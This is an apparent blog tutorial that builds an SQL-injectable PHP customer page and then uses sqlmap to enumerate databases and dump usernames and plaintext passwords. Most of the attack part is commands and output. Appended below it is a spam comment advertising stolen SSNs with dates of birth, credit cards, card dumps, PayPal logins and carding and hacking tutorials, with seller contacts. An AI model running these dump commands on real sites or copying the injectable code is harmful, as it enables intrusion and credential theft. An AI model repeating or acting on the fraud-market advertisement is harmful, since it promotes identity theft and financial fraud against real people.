In this tutorial, we develop a sample web application and launch an SQL Injection attack against it, to grab the usernames and passwords from the database.
The Web application and database table is given below:
1) The login page 'cust_login.html'
cust_login.html
<html>
<body>
<form method="get" action="cust_display.php">
<label for="name">User Name:</label>
<input type="text" id="name" name="name" /><br />
<input type="submit" value="login" name="submit" />
</form>
</body>
</html>
2) The page 'cust_display.php' displays the customer details
cust_display.php
<html>
<body>
<?php
$name = $_GET["name"];
$conn = new mysqli("localhost","root","root","hacking");
if ($conn->connect_error){
die("Connection failed: " . $conn->connect_error);
}
$sql = "select name,firstname,surname,address from customer where name = '" . $name . "'";
$result = $conn->query($sql);
$row= $result->fetch_assoc();
echo "firstname: " . $row["firstname"]. "<br>";
echo "surname: " . $row["surname"]. "<br>";
echo "address: " . $row["address"]. "<br>";
$conn->close();
?>
</body>
</html>
3) The MySQL database table Customer
MariaDB [hacking]> desc customer;
+-----------+--------------+------+-----+---------+-------+
| Field | Type | Null | Key | Default | Extra |
+-----------+--------------+------+-----+---------+-------+
| name | varchar(50) | NO | PRI | NULL | |
| passwd | varchar(50) | YES | | NULL | |
| firstname | varchar(50) | YES | | NULL | |
| surname | varchar(50) | YES | | NULL | |
| address | varchar(200) | YES | | NULL | |
+-----------+--------------+------+-----+---------+-------+
4) Launching SQL Injection attack against the web application
4.1) Fetch list of available databases
root@kali:~# sqlmap -u http://www.mycompany.com/cust_display.php?name=shabbir --dbs
available databases [6]:
[*] hacking
[*] information_schema
[*] mybank
[*] mysql
[*] performance_schema
[*] test
4.2) Fetch list of tables in database 'hacking'
root@kali:~# sqlmap -u http://www.mycompany.com/cust_display.php?name=shabbir -D hacking --tables
Database: hacking
[1 table]
+----------+
| customer |
+----------+
4.3) Fetch list of columns in table 'customer'
root@kali:~# sqlmap -u http://www.mycompany.com/cust_display.php?name=shabbir -D hacking -T customer --columns
Database: hacking
Table: customer
[5 columns]
+-----------+--------------+
| Column | Type |
+-----------+--------------+
| address | varchar(200) |
| firstname | varchar(50) |
| name | varchar(50) |
| passwd | varchar(50) |
| surname | varchar(50) |
+-----------+--------------+
4.4) Fetch list of 'username,password' from table 'customer'
root@kali:~# sqlmap -u http://www.mycompany.com/cust_display.php?name=shabbir -D hacking -T customer -C name,passwd --dump
Database: hacking
Table: customer
[4 entries]
+---------+--------+
| name | passwd |
+---------+--------+
| pk | aunty |
| priya | blue |
| shabbir | admin |
| taher | hello |
+---------+--------+
SSN FULLZ AVAILABLE
ReplyDeleteFresh & valid spammed USA SSN+Dob Leads with DL available in bulk.
>>1$ each SSN+DOB
>>3$ each with SSN+DOB+DL
>>5$ each for premium fullz (700+ credit score with replacement guarantee)
Prices are negotiable in bulk order
Serious buyer contact me no time wasters please
Bulk order will be preferable
CONTACT
Telegram > @leadsupplier
ICQ > 752822040
Email > leads.sellers1212@gmail.com
OTHER STUFF YOU CAN GET
SSN+DOB Fullz
CC's with CVV's (vbv & non-vbv)
USA Photo ID'S (Front & back)
All type of tutorials available
(Carding, spamming, hacking, scam page, Cash outs, dumps cash outs)
SQL Injector
Premium Accounts (Netflix, Pornhub, etc)
Paypal Logins
Bitcoin Cracker
SMTP Linux Root
DUMPS with pins track 1 and 2
WU & Bank transfers
Socks, rdp's, vpn
Php mailer
Server I.P's
HQ Emails with passwords
All types of tools & tutorials.. & much more
Looking for long term business
For trust full vendor, feel free to contact
CONTACT
Telegram > @leadsupplier
ICQ > 752822040
Email > leads.sellers1212@gmail.com